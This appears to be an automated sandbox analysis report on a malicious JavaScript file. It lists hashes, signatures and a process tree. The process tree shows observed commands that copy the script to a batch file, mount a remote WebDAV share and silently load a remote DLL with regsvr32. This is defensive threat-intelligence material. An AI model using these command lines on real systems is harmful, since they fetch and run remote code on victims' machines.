Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
-
submitted
09-07-2024 06:30
General
-
Target
3196914214168893502.js
-
Size
5KB
-
MD5
f8e548cebdeb938069478f2129a4db9c
-
SHA1
6c433fca0377733e77dacf7f0affb5834e788562
-
SHA256
ba1ba1779f8881981956c8299c71b448bce1d6d788fabc76eaac9275ab7921b8
-
SHA512
b7990b24372ea5c2448fc1d5936dfb037cf5aa6976d4b168c3f5f6610adb2f4994d4d248ceda2ec1d02988f3691a06218fa43737c8227e23f8c123cb27cefd71
-
SSDEEP
96:3BRG8KeMricUlRbHLLyAcnH0xPw7SkRw75:3BRb7MmcUnLJcH0xlkRY
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\3196914214168893502.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\3196914214168893502.js" "C:\Users\Admin\\jrivkr.bat" && "C:\Users\Admin\\jrivkr.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\213.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5f8e548cebdeb938069478f2129a4db9c
SHA16c433fca0377733e77dacf7f0affb5834e788562
SHA256ba1ba1779f8881981956c8299c71b448bce1d6d788fabc76eaac9275ab7921b8
SHA512b7990b24372ea5c2448fc1d5936dfb037cf5aa6976d4b168c3f5f6610adb2f4994d4d248ceda2ec1d02988f3691a06218fa43737c8227e23f8c123cb27cefd71